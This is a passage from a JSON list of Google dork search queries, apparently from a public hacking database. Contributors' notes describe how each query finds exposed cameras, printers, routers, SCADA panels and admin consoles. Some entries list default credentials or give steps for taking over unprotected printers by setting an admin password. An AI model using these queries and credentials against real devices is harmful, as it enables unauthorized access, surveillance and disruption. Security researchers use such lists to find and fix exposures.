how secure it is."}, {"dork": "'apc info' 'apc.php?SCOPE='", "description": "This dork will locate Unsecured PHP APC Installations.\nWith regards,\nShubham Mittal\n(Hack Planet Technologies)\nhttp://hackplanet.in"}, {"dork": "intitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\"", "description": "Pyxis Mobile Test Page\nintitle:\"Pyxis Mobile Test Page\" inurl:\"mpTest.aspx\""}, {"dork": "inurl:32400/web/index.html", "description": "Submitting this for the GHDB. These are web accessible Plex Media Servers\nwhere you can watch/listen to other people's media collections.\nFYI"}, {"dork": "intitle:\"dd-wrt info\" intext:\"Firmware: DD-WRT\"", "description": "This dork finds web interfaces of various routers using custom firmware DD-WRT.\n Default login: root\n Default password: admin\n greetings, uA"}, {"dork": "inurl:\"/level/13|14|15/exec/\"", "description": "inurl:\"/level/13|14|15/exec/\"\nCisco IOS HTTP Auth Vulnerability .. Command before exec/ . Example\nexec/-/?"}, {"dork": "inurl:\"Orion/SummaryView.aspx\" intext:\"Orion Core\"", "description": "Hello,\nEnumerate Solarwinds Orion network monitoring portals. In some cases, the\nportal can be accessed without authenticating.\n-Sean"}, {"dork": "inurl:/Portal/Portal.mwsl?PriNav=FileBrowser", "description": "inurl:/Portal/Portal.mwsl?PriNav=FileBrowser\r\n\r\nAccess into simatic step 7 plc software systems \r\n\r\nby dekingofcyber...."}, {"dork": "intitle:\"Weather Wing WS-2\"", "description": "#Summary:Weather Wing (http://www.meteo-system.com/ws2.php) Portal.\n#Category: Various Online Divices\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"NetBotz Network Monitoring Appliance\"", "description": "#Summary:Various Online Divices\n#Category: Pages containing login portals\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Transponder/EOL Configuration:\" inurl:asp", "description": "#Summary: Cheeta Technologies Transponder Configuration Portal (*\nhttp://www.cheetahtech.com).*\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"Web Image Monitor\" & inurl:\"/mainFrame.cgi\"", "description": "#Summary: Several printers that use \"Web Image Monitor\" control panel (\nhttp://ricoh.pbworks.com/w/page/14063393/CSWebImageMonitor). Used default\nby Ricoh, Lanier and others.\n#Author: g00gl3 5c0u7"}, {"dork": "intitle:\"SPA504G Configuration\"", "description": "Dork : intitle:\"SPA504G Configuration\"\nResult : Gives access to Cisco SPA504G Configuration Utility for IP phones\nScreenshot Google Dork\nDork found by :\nredN00ws"}, {"dork": "inurl:\"/cgi-mod/index.cgi\"", "description": "Returns login pages for various Barracuda Networks branded hardware spam\nfilters and mail archivers.\n4N6 Security"}, {"dork": "intitle:\"RouterOS router configuration page\"", "description": "Returns login portals for Microtik routers running RouterOS version 5\nand up.\n4N6 Security"}, {"dork": "inurl:\"/webcm?getpage=\"", "description": "Returns various Actiontec (and often Qwest) branded routers' login pages.\n4N6 Security"}, {"dork": "intitle:\"Web Client for EDVS\"", "description": "Yet another DVR system. Probably requires Java to display.\n4N6 Security"}, {"dork": "intitle:\"IPCam Client\"", "description": "Foscam IPCam\nBy default these cameras attach to the myfoscam.org DDNS. So you could add\nsite:myfoscam.org. On the otherhand if you're hunting for DDNS servers, you\ncould negate that site and examine the other results.\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "intitle:\"RT at a glance\" intext:\"quick search\"", "description": "RT Request Tracker Ticket Database\nhttp://www.bestpractical.com/rt/\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "filetype:jnlp", "description": "Java Web Start (Java Network Launch Protocol)\n-- \n-[Voluntas Vincit Omnia]-\nwebsite http://www.erisresearch.org/\nGoogle+ https://plus.google.com/u/0/114827336297709201563"}, {"dork": "inurl:\"/public.php?service=files\"", "description": "Search for shared files from ownCloud\nDaniel Maldonado\nhttp://caceriadespammers.com.ar"}, {"dork": "inurl:dfshealth.jsp", "description": "dork:inurl:dfshealth.jsp\ndirect get the access of hadoop cluster with root user\n-- \nSimmant Yadav"}, {"dork": "inurl:\"phy.htm\" intitle:\"Touchstone Status\"", "description": "Hits: 4,250 results\nThis dork finds PacketCable 1.0 Touchstone Telephony Modems that are online\nwherein you see its event logs, system information, interface parameters,\nmac addresses, etc.\n*Jay Turla a.k.a shipcode*"}, {"dork": "inurl:dyn_sensors.htm", "description": "MiniGoose II environmental temprature monitoring panel \nAuthor:@cns0x"}, {"dork": "inurl:.cgi-bin/webproc", "description": "inurl:.cgi-bin/webproc\nLogin for various type of router.\nBy Rootkit."}, {"dork": "inurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive", "description": "## Open Seagate NAS drives\ninurl:ftp inurl:Seagate inurl:Backup inurl:Plus inurl:Drive\nJason Coleman - CISSP, GWAPT\nAnalyst, Security Management Program | Verizon Enterprise Solutions"}, {"dork": "inurl:\"/certsrv\" intext:\"Select a task\"", "description": "Microsoft Certificate Request Webpage.\nAuthor: Felipe Molina (@felmoltor)"}, {"dork": "allinurl:awstats.pl ext:pl", "description": "A lot of Panels with Statics Advanced. Enjoy.\nBy Rootkit."}, {"dork": "inurl:\"/squid-reports/\" AND intitle:\"SARG reports\"", "description": "Search the Sarg monitoring graphs of Web Proxy SQUID3\nIng. Daniel Maldonado\nhttp://www.caceriadespammers.com.ar"}, {"dork": "intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm", "description": "# Exploit Title: Unprotected HP Laserjets\n# Google Dork: intitle:\"hp laserjet\" inurl:SSI/Auth/set_config_deviceinfo.htm\n# Date: 15/08/2015\n# Exploit Author: Anonymous\nChange default password or add your own password as the printers come without a password which allows others to mess with settings and print various things."}, {"dork": "intitle:\"IPCam\" inurl:monitor2.htm", "description": "EasyN IP webcam WebUI.\nCategory: Various Online devices\n- Fitzl Csaba"}, {"dork": "intitle:\"WebService Web Service\" ext:asmx", "description": "Servers with \"Web Service commands activated\".\nDork by Rootkit Pentester."}, {"dork": "inurl:printer/main.html", "description": "This Dork reveals a lot of Printers Panels.\nEnjoy with moderation xD.\nThis Dork is discovered by Rootkit Pentester."}, {"dork": "intitle:Global Traffic Statistics \"Ntop\"", "description": "Google dork Description: View Global Traffic Statistics\nGoogle search: intitle:Global Traffic Statistics \"Ntop\"\nSubmited: 2015-10-3\nNote:\nNtop shows the current network usage. It displays a list of hosts that \nare currently using the network and reports information concerning the \nIP (Internet Protocol) traffic generated by each host."}, {"dork": "inurl:axis.cgi ext:cgi", "description": "Dork for all axis cams. Enjoy with them!.\nThese Dork is Discovered by Rootkit Pentester."}, {"dork": "inurl:webvisu.htm ext:htm", "description": "Google dork Description: View SCADA web visual interface\nGoogle search: inurl:webvisu.htm ext:htm\nSubmited: 2015-10-8\nNote:\nSCADA web visual. - Yudha[at]glosmon.com"}, {"dork": "\"Build ref: 26\"", "description": "Google Dork Description: Automatic Number Plate Recognition Systems (ANPRs)\nCameras\nGoogle Search: \"Build ref: 26\"\nVendor: PIPS Technology (3M)\nhttp://www.roadtraffic-technology.com/contractors/photo_enforcement/pips-technology\nListing of ANPRs/ALPRs cameras.\nJohn Jolly"}, {"dork": "inurl:net/net/airprint.html", "description": "Title: inurl:net/net/airprint.html\nDescription : This dork can access many printers without login.\nBy Sivabalan"}, {"dork": "inurl:/net/net/protocol.html", "description": "Title: inurl:/net/net/protocol.html\nDescription: This dork can access many printers without login \nBy Sivabalan"}, {"dork": "intitle:(build 13064) - Info", "description": "Dork for DD-WRT routers with V24 build number 13064.\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:/tcpipv6.htm", "description": "inurl:/tcpipv6.htm\nDescription: This google dork can access many HP LASER JET printers without login..\nBy Sivabalan ( CYBER GENIUS ).."}, {"dork": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/", "description": "inurl:/cgi-bin/luci/freifunk/graph/olsrd/topology/\nDescription : This google dork can access many ( LuCI Trunk based wireless system management) \n By Sivabalan( CYBER GENIUS ) ..."}, {"dork": "inurl:/hp/device/supply_status.htm", "description": "inurl:/hp/device/supply_status.htm\nDescription : This google dork can access many HP LASER JET printers without login\nBy Sivabalan ( CYBER GENIUS )..."}, {"dork": "inurl:/index.htm?cat=info&pagesRemaining", "description": "inurl:/index.htm?cat=info&pagesRemaining\nDescription: This google dork can access many HP LASER JET PRO printer..\nBy Sivabalan( CYBER GENIUS ) ..."}, {"dork": "inurl:/index.htm?cat=info&printerInfo", "description": "inurl:/index.htm?cat=info&printerInfo\nDescription : This google dork can access many HP LASER JET printers without login..\nBy Sivabalan ( CYBER GENIUS )"}, {"dork": "\"IPSentry - Device Statistics Information\"", "description": "This Dork show Device Statistics Information, about a lot of network\ninfraestructures xD. Enjoy Healthy.\nDork Discovered for Rootkit Pentester."}, {"dork": "\"Web page sent by InterMapper\"", "description": "Dork with funny maps of networks.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "intitle:\"homematic webui\"", "description": "Description: WebUI for Homematic Home-Control-System\nGoogle search : intitle:\"homematic webui\"\nAuthor : BasisX & DonJoe"}, {"dork": "intitle:webcam 7 inurl:8080 -intext:8080", "description": "Dork with webcams servers.\nEnjoy with the view.\nDork by Rootkit Pentester.\nRegards."}, {"dork": "inurl:login inurl:user inurl:pass -intext:pass -intext:user", "description": "With this Dork you can Bypass the security of a lot of Cpanel Portal.\nHave Fun.\nDork discovered by Rootkit Pentester."}, {"dork": "inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web Image Monitor\"", "description": "Description: Web Image Monitor allows users to remotely monitor and\nchange the network configuration of Ricoh copiers, multifunctions and\nprinters via common web browsers\nGoogle search: inurl:\"topPage.cgi\" | inurl:\"mainFrame.cgi\" intext:\"Web\nImage Monitor\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"SyncThru Web Service\" inurl:\"sws\"", "description": "Description: Samsung printer web panel\nGoogle search: intitle:\"SyncThru Web Service\" inurl:\"sws\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\" | inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" | inurl:\"index.htm?cat=bluetooth\"", "description": "Description: HP OfficeJet printer web panel\nGoogle search: inurl:\"home.htm?cat=home\" | inurl:\"index.htm?cat=info\"\n| inurl:\"index.htm?cat=settings\" | inurl:\"index.htm?cat=network\" |\ninurl:\"index.htm?cat=bluetooth\"\nAuthor: nebo_oben"}, {"dork": "inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"", "description": "Description: Dell Laser printer web panel\nGoogle search: inurl:\"cgi-bin/dynamic/\" inurl:\"html\" intitle:\"Printer Status\"\nAuthor: nebo_oben"}, {"dork": "intitle:\"TRENDnet\" (inurl:\"top.htm\"| inurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" | inurl:\"JVIEW.HTM\")", "description": "Description: TRENDnet IP camera\nGoogle search: intitle:\"TRENDnet\" (inurl:\"top.htm\"|\ninurl:\"STSSYS.HTM\"| inurl:\"AVIEW.HTM\"| inurl:\"JPlug.htm\" |\ninurl:\"JVIEW.HTM\")\nAuthor: nebo_oben"}, {"dork": "intitle:Tenda ADSL2/2+ Modem inurl:main.html", "description": "Description: Tenda ADSL2/2+ Modem with Wireless Router\nGoogle search: intitle:Tenda ADSL2/2+ Modem inurl:main.html\nAuthor: nebo_oben"}, {"dork": "intitle:\"Residential Gateway Configuration:\" intext:\"Cable Modem Information.\"", "description": "Various online cable modem devices! More info:\nhttp://www.ubeeinteractive.com \nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "intext:\"powered by webcamXP 5\"", "description": "Various webcamXP version 5! More info: http://webcamxp.com\nAuthor: Augusto Pereira\nhttp://www.augustopereira.com.br"}, {"dork": "inurl:lg intitle:\"Looking Glass\"", "description": "Panels with lot of information of bgp and ping, tracert services and more\nxD.\nBest Regards.\nRootkit Pentester."}, {"dork": "inurl:/view/viewer_index.shtml", "description": "inurl:/view/viewer_index.shtml \nUsing this google dork can access various camera LIVE AXIS MODEL around the world ..\nTHis google dork is created by CYBER GENIUS ( SIVABALAN )."}, {"dork": "inurl:userRpm inurl:LoginRpm.htm", "description": "The below dork can list all the TPLink routers available.inurl:userRpm inurl:LoginRpm.htm\nRegards,\nSrini"}, {"dork": "/@fmb80_encoder.htm", "description": "Hi !\nI'm a sound technicien in radio fm world\nThis dork give u acces to digiplexer (u can change text of all the listener of a FM radio in there car for exemple : ) )\npeace"}, {"dork": "inurl:/awcuser/cgi-bin/", "description": "Google Dork for Mitel systems:\ninurl:/awcuser/cgi-bin/\n@_aliardic_"}, {"dork": "inurl:top.htm inurl:currenttime", "description": "Dork with a lot of cameras online.\nEnjoy Healthy.\nRegards.\nDork by Rootkit Pentester."}, {"dork": "inurl:/Portal/Portal.mwsl", "description": "This is a dork for the Siemens S7 series of PLC controllers. (SCADA)\nPs. Some are unrestricted\n*Supernova*"}, {"dork": "inurl:/mjpgmain.asp", "description": "Name = Live view of Y-cam\nGoogle dork Description:\ninurl:/mjpgmain.asp\nDate: 2016-10-19\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:\"-/monitoring\" \"statistics of JavaMelody\"", "description": "Monitoring of JavaEE applications.\nPermit to visualize sql request, expire current http user sessions, gather\nsystem information etc ...\nPrunier Charles-Yves"}, {"dork": "\"Upload\" inurl:\"https://webfiles\"", "description": "This dork finds pages vulnerable to directory traversal, upload and download of files.\nDork: \"Upload\" inurl:\"https://webfiles\"\n-Gee"}, {"dork": "inurl:\"apc.php\" intitle:\"APC INFO\"", "description": "# Google Dork: inurl:\"apc.php\" intitle:\"APC INFO\"\n# Date: 11/1/2016\n# Author: Mk0Underground"}, {"dork": "intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET intext:POST inurl:op", "description": "Google Dork: intext:SOAP 1.1 intext:SOAP 1.2 intext:UPLOAD intext:GET\nintext:POST inurl:op\nAuthor: Aconite33\nDescription: Identify vulnerable sites that have SOAP, POST/GET functions"}, {"dork": "intitle:\"Login\" inurl:\"/doc/page/login.asp\"", "description": "Interface for HikVision web cam\nGoogle Dork: intitle:\"Login\" inurl:\"/doc/page/login.asp\"\nDate: 2016-11-28\nAuthor: Devendra Singh Solanki"}, {"dork": "site:webex.com inurl:tc3000", "description": "This dorks can access to some meetings information. \nsite:webex.com inurl:tc3000\nsite:webex.com inurl:siteurl=meetings"}, {"dork": "intitle:\"Log In to AR Web\"", "description": "Huawei AR Routers login panels\nGoogle Dork: intitle:\"Log In to AR Web\"\nDate: 2016-12-14\nAuthor: Devendra Singh Solanki"}, {"dork": "inurl:\"/html/modeminfo.asp?", "description": "at&t and NetGear router information.\nAlso\ninurl:\"/html/login.asp?\" intext:\"REMOTE ACCESS IS CURRENTLY ENABLED.\"\n-Xploit"}, {"dork": "\"All site content\" ext:aspx", "description": "Dork for locate Sharepoint Administration webs.\nEnjoy healthy.\nDork made by Rootkit Pentester."}, {"dork": "inurl:\"/viewlsts.aspx?BaseType=\"", "description": "SharePoint Files \nAlso,\ninurl:\"/mWord.aspx?doc=\"\ninurl:\"/mXL.aspx?doc=%2\"\ninurl:\"/mPPT.aspx?doc=\"\n-Xploit"}, {"dork": "inurl:cgi-bin \"ARRIS Enterprises\"", "description": "Dork for Panels ARRIS Router.\nEnjoy healthy.\nDork made by Rootkit Pentester."}, {"dork": "inurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh) ~'/html'", "description": "Dork:\nFind a List of FTP Servers by IP address, mostly Windows NT servers with\nguest login capabilities.\nExample:\ninurl:~/ftp://193 filetype:(php | txt | html | asp | xml | cnf | sh)\n~'/html' -'pub' -'public' -'mp3' -fossies -websvn -svn -git -login -.de\n-.fl -.ru -.jp -.kr -.ch -.dk -.edu -dorks -google -Google -.gov -prevent\n-help -how -reset -your -developer -reference -support -github admin\nAnything with \"-\" in the beginning is used to help combat the fact that\ngoogle does not really want us to see all of the results. If we do not\nfilter through, google will mark us as a bot user and block our ip address.\nThe \"do not search\" expression is as important as the term or phrase we\nwish to search and match for.\nThanks,\nMrM"}, {"dork": "inurl:\"/graphs\" intext:\"Traffic and system resource graphing\"", "description": "View results for mikrotik graphics interfaces\ninurl:\"/graphs\" intext:\"Traffic and system resource graphing\"\nVer\u00f3nica Ovando (AKA verovan)"}, {"dork": "inurl:cgi-bin/lsnodes_web?node", "description": "Dork for status node of radios online.\nDork by Rootkit Pentester."}, {"dork": "inurl:\"/HtmlAdaptor?action=\"", "description": "JBoss JMX-Console MBean Viewer\nHere are also more dorks. \nintitle:JMX MBean View inurl:/jmx-console/HtmlAdaptor?action\nintitle:\"MBean Inspector\"\ninurl:\"jmx-console/HtmlAdaptor?\" JMX MBean\n-Xploit"}, {"dork": "intext:VIEWS \u00b7 Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES \u00b7 Browse \u00b7 Structure \u00b7 SQL \u00b7 Search \u00b7 Export", "description": "Description : This google dork can access many websites phpmyadmin web server.\nGoogle dork: intext:VIEWS \u00b7 Server: - Database: information_schema - Table: SCHEMA_PRIVILEGES \u00b7 Browse \u00b7 Structure \u00b7 SQL \u00b7 Search \u00b7 Export.\nThis google dork created by dekingofcyber( SIVABALAN )"}, {"dork": "inurl:guestimage.html", "description": "Mobotix cameras online.\r\n\r\nBy Rootkit Pentester."}, {"dork": "inurl:\"set_config_networkIPv6.html\"", "description": "Finds lots of HP colour printers hooked up to the internet\r\n\r\nDxtroyer"}, {"dork": "\"Use these fields to set or change the Administrator Password. When set, the Administrator Password is required before you can access and change configuration parameters. To disable the Administrator Password, leave the entries blank.\"", "description": "The following Google search gives output of HP printers whose authentication\r\nis not set. Hence an attacker can simply visit the links from the dork\r\noutput to set Administrator Password .\r\n\r\n\r\n\"Use these fields to set or change the Administrator Password. When set, the\r\nAdministrator Password is required before you can access and change\r\nconfiguration parameters. To disable the Administrator Password, leave the\r\nentries blank.\"\r\n\r\n \r\nOnce the password is set, the attacker gets admin access to the HP printer.\r\nThis can be used to cause disruption.\r\n\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:\"ews/setting/setews.htm\"", "description": "The google dork leads to various Dell/DocuPrint printers whose authentication is not set.\r\nAn attacker can set a new password and restart printer to apply new settings.\r\nOnce a new password is created, the attacker can disrupt the printer or take control of it remotely for data theft.\r\n\r\nAnkit Anubhav,NewSky Security"}, {"dork": "inurl:\"/address/speeddial.html?start\" and intext:\"Please configure the password\" and intitle:\"Brother\"", "description": "The following dork gives the list of Brother Printers whose panels do not have an administrator password.\r\n\r\nSteps to take control of the Brother printer ::\r\n\r\n\r\n 1. Use the dork to get the list of Brother printers whose password is not configured. The user will get output like hxxp://{URL}/address/speeddial.html?start=1&pageid=10\r\n 2. Extract the URL/IP and construct a URL like hxxp://{URL}/admin/password.html\r\n 3. This URL will lead the attacker to the page where administrator password can be set.\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:\"/websys/webArch/mainFrame.cgi\" -hatana", "description": "Finds vulnerable printers\r\n\r\nDxtroyer"}, {"dork": "inurl:\"apps/console/sepm\"", "description": "This dork will provide you all the Semantec Endpoint managers , that not\r\nbeing configured properly,\r\n\r\n\r\nRegards\r\n\r\nfu2x2000"}, {"dork": "intitle:\"Status & Control\" + \"Thermostat Status\" +\"HVAC Settings\" +\"Zone Temperature\"", "description": "The dork gives output as a list of smart (Network/NT) thermostats.\r\nWithout authentication, a viewer can get information like Zone Temperature and other thermostat settings.\r\n\r\nAnkit Anubhav, NewSky Security"}, {"dork": "inurl:embed.html inurl:dvr", "description": "Dork who show live cams and tv.\r\nDork by Rootkit Pentester."}, {"dork": "intitle:Armstrong Hot Water System Monitoring", "description": "Armstrong Hot water System Monitoring\r\n\r\ndefault credentials:\r\n\r\nuser: armstrong\r\npass: brainscan\r\n\r\n-- \r\n@ak1t4\r\nWhiteHat Hacker - Security Analyst - Bug Bounty Hunter\r\n\r\nhackerone.com/ak1t4\r\ntwitter.com/knowledge_2014"}, {"dork": "inurl:\"/cgi-bin/filemanager/Manager.pl\"", "description": "Google dork for iDC File Manager.\r\n\r\niDC File Manager is a secure multi user web based File Management\r\nSystem, that allows you to store, manage and share every format of\r\ndigital media, including, documents, images, audio, video, publishing\r\nlayouts, presentations and PDF files Between you and your end users.\r\n\r\nIf your Company has a requirement to distribute or share files with\r\ncustomers, suppliers, remote workers or just internally, then iDC File\r\nManager is the best solution for you."}, {"dork": "inurl:/add_vhost.php?lang=", "description": "inurl:/add_vhost.php?lang=\r\n\r\nNisankh Acharjya"}, {"dork": "\"ADS-B Receiver Live Dump1090 Map \"", "description": "Dork who show traffic air for ADS-B Receiver.\r\n\r\nDork by Rootkit_Pentester."}, {"dork": "inurl:public \"Powered by SecureW2\"", "description": "Software for wifi access points.\r\nDork by Rootkit Pentester"}, {"dork": "inurl:cloud_main.asp", "description": "# Google Dork: [inurl:cloud_main.asp]\r\n\r\n# Date: [02/03/2018]\r\n\r\n# Exploit Author: [MikiDiCalenella]\r\n\r\nDescription: web ui for Asus Aicloud"}, {"dork": "inurl::5601/app/kibana", "description": "Check this out multiple ELK/Kibana management portal are open with no \r\ncreds on the default port 5601\r\n\r\n\r\nUsing this dork inurl::5601/app/kibana\r\n\r\nMore results could be found on shodan as well.\r\n\r\nBR\r\n\r\n\r\nZiad Khalil\r\n\r\n@z0day"}, {"dork": "inurl:control/camerainfo", "description": "Dashboard with info of a lot of webcams!!!\r\n\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:\"Yawcam\" inurl:8081", "description": "# Dork Title: [unprotected Yawcam webcam]\r\n# Google Dork: [intitle:\"Yawcam\" inurl:8081]\r\n# Description: Access to unprotected Yawcam webcams via browser.\r\n# Date: [01/03/2018]\r\n# Dork Author: [Sohaib E.B.]\r\n# Vendor Homepage: [http://www.yawcam.com]"}, {"dork": "ext:php + inurl:\"ajaxfilemanager.php\" + intext:\"Current Folder Path\"", "description": "Ajax File Manager\r\n\r\n#p1x33l"}, {"dork": "intext:\"https://chat.whatsapp.com/invite/\" intitle:\"Your Search For Company/Subject/Whatever\"", "description": "# Exploit Title: WhatsApp Group / Easy Point to information gathering and Social Engineering\r\n# Google Dork: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"Your Search For Company/Subject/Whatever\"\r\n\r\n# Dork Sample: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"hacking\"\r\n# Dork Sample: intext:\"https://chat.whatsapp.com/invite/\" intitle:\"target company\"\r\n\r\n# Date: 07/04/2018\r\n\r\n# Contains sensitive information:\r\n Link for Public And Private Groups of WhatsApp\r\n\r\n# Dork Author: Carlos E. Vieira"}, {"dork": "inurl:\":2083/login/?user=\"", "description": "Cpanel that are logged in with Hosted Sites.\r\n\r\n\r\nAuthor: Parth S. Patel"}, {"dork": "inurl:report.cgi?dashboard=", "description": "Dork who show MaDDash panels of traffic the net.\r\n\r\nDork by Rootkit Pentester"}, {"dork": "intext:build:SVNTag= JBoss intitle:Administration Console inurl:web-console", "description": "JBoss AS management console.\r\n\r\n\r\n\r\nAuthor: Parth S. Patel\r\nhttps://ca.linkedin.com/in/parthpateloscp"}, {"dork": "inurl:\"mjpg/video.cgi?resolution=\"", "description": "inurl:\"mjpg/video.cgi?resolution=\" || inurl:\"mjpg/video.cgi\"\r\n\r\nThis dork show a lot of videp.cgi pages!!!\r\n\r\nManhNho"}, {"dork": "intitle:Munin :: overview", "description": "intitle:Munin :: overview\r\n\r\nMunin - Open Source System Monitoring system (No Auth)\r\n\r\nManhNho"}, {"dork": "inurl:jpegpull.htm", "description": "Dork show Webcams CCTV.\r\nEnjoy healthy.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:'System Web Interface: WATTrouter M'", "description": "Dork about WATTrouter M SSR - programmable controller to optimize\r\nself-consumption of energy produced by photovoltaic or wind power plant\r\n\r\nintitle:'System Web Interface: WATTrouter M'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"default values: admin/1234\"", "description": "intext:\"default values: admin/1234\"\r\n\r\ndefault password of WATTrouter M - System Web Interface\r\n\r\nManhNho"}, {"dork": "inurl:'/SSI/Auth/ip_configuration.htm'", "description": "Dork about internal IP exposures and configuration from HP Printer\r\n\r\ninurl:'/SSI/Auth/ip_configuration.htm'\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intext:\"Powered by www.yawcam.com\"", "description": "intext:\"Powered by www.yawcam.com\"\r\n\r\nintext:\"Password Please! User: Pass: Fps. Quality. Scale. Sound. \"\r\n\r\nYawcam cameras online\r\n\r\nManhNho"}, {"dork": "intitle:\"UltraDNS Client Redirection Service\"", "description": "intitle:\"UltraDNS Client Redirection Service\"\r\n\r\nUltraDNS client\r\n\r\nManhNho"}, {"dork": "(intitle:\"plexpy - home\" OR \"intitle:tautulli - home\") AND intext:\"libraries\"", "description": "Helps to locate unprotected (no user/password needed) Tautulli servers. Tautulli (Formerly PlexPy) is a 3rd party application for monitoring the activity and tracks various statistics of a Plex Media Server. More info: (https://tautulli.com)\r\n\r\nGerard Fuguet (gerard@fuguet.cat)"}, {"dork": "inurl:\"/gitweb.cgi?\"", "description": "Google dork *description: * A web-enabled interface to the open source\r\ndistributed version control system Git\r\n\r\n*Google Search: *inurl:\"/gitweb.cgi?\"\r\n\r\nSubmitted by: Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "intext:\"Build dashboard\" intext:\"Project\" intext:\"Plan\" intext:\"Build\"", "description": "Detail: Can be used to find public facing build servers such as Bamboo\r\nGoogle Dork: intext:\"Build dashboard\" intext:\"Project\" intext:\"Plan\" intext:\"Build\"\r\nDate: 9-1-2018\r\nExploit Author: hehnope"}, {"dork": "site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view", "description": "# Google Dork: site:drive.google.com /preview intext:movie inurl:flv | wmv | mp4 -pdf -edit -view\r\n# Date: 2018-09-15\r\n# Author: Akalanka Ekanayake (Jake Logan)\r\n# Vendor Homepage: https://securehacker.co.uk\r\n\r\nThis dork will help you to find out videos published in Google\r\ndrive.(Movies,Tv series,clips .etc)\r\n\r\nExample :\r\n\r\nsite:drive.google.com /preview *intext:tv series* inurl:flv | wmv |\r\nmp4 -pdf -edit -view\r\n\r\nsite:drive.google.com /preview *intext:tutorial* inurl:flv | wmv | mp4\r\n-pdf -edit -view\r\n\r\nsite:drive.google.com /preview *intext:720p *inurl:flv | wmv | mp4\r\n-pdf -edit -view"}, {"dork": "inurl:home.tcl intitle:gaia", "description": "Check Point Firewalls & Clusters\r\n\r\n\r\nBruno Schmid\r\nhttps://ch.linkedin.com/in/schmidbruno"}, {"dork": "inurl:phpPgAdmin intext:\"Cappuccino\" | intext:\"Blue/Green\"", "description": "This dork will identifies websites that have phpPgAdmin ,a web-based\r\nadministration tool for PostgreSQL\r\n\r\nSandeep S S"}, {"dork": "intitle:\"SQLiteManager\" + intext:\"Welcome to SQLiteManager version \"", "description": "intitle:\"SQLiteManager\" + intext:\"Welcome to SQLiteManager version \"\r\n\r\nSQLite Manager panel\r\n\r\nManhNho"}, {"dork": "inurl:\"swagger-ui/index.html\"", "description": "Searching for the unprotected swagger APIs link."}, {"dork": "intitle:\"Swagger UI - \" + \"Show/Hide\"", "description": "swagger APIs link\r\n\r\nManhNho"}, {"dork": "inurl:/sample/LvAppl/lvappl.htm", "description": "[*] Dork: inurl:/sample/LvAppl/lvappl.htm\r\n\r\nDork to find Network Camera Server\r\n\r\nDrok3r"}, {"dork": "allinurl:control/multiview", "description": "[*] Dork: allinurl:control/multiview\r\n\r\n[i] Con este dork, podemos encontrar camaras CCTV MOBOTIX expuestas online\r\n\r\nDrok3r"}, {"dork": "allinurl:DialogHandler.aspx", "description": "Sites running Telerik Web UI Dialog Handler\r\n\r\nallinurl:DialogHandler.aspx\r\n\r\nDiscovered By: Kevin Randall"}, {"dork": "intitle:\"VertrigoServ\" + \"Welcome to VertrigoServ\"", "description": "unauthenticated WAMP - admin panel\r\n\r\nManhNho"}, {"dork": "inurl:/certsrv/certrqus.asp", "description": "Author: Mattias Borg (Sec-Labs R&D)"}, {"dork": "inurl:/help/lang/en/help", "description": "Find MOBOTIX Cameras\r\n\r\nGuest View\r\n/cgi-bin/guestimage.html\r\nMulti View\r\n/control/multiview\r\n\r\nBy TheCrypticSailor"}, {"dork": "inurl:public.php inurl:service ext:php", "description": "Files and Folders in the cloud.\r\n\r\nDork by Rootkit Pentester."}, {"dork": "intitle:ProFTPD Admin - V1.04", "description": "intitle:ProFTPD Admin - V1.04\r\n\r\nwill show you admin page, no login needed\r\n(by XLOMBOX)"}, {"dork": "intitle:\"VB Viewer\"", "description": "This search finds several more webcams or IPCams\r\n\r\nintitle:\"VB Viewer\"\r\n\r\nAuthor : *.doc-TOR aka Brain Reflow https://twitter.com/The_d0c_T0R"}, {"dork": "intitle: \"Nexus Repository Manager\"", "description": "*Google dork description: *Sites running the Nexus Repository Manager\r\n\r\n*Google Search:* intitle: \"Nexus Repository Manager\"\r\n\r\n*Submitted by:* Alfie\r\n\r\nWebsite: (https://the-infosec.com)"}, {"dork": "inurl:/setup.cgi@next_file=", "description": "Unauthorized Cisco LinkSys wireless\r\n\r\nManhNho"}, {"dork": "\"Please click here to download and install the latest plug-in. Close your browser before installation.\"", "description": "# Exploit Title: NVR Login Portal.\r\n# Google Dork: \"Please click here to download and install the latest plug-in. Close your browser before installation.\"\r\n# Description: Find NVR (Network Video Recorder) 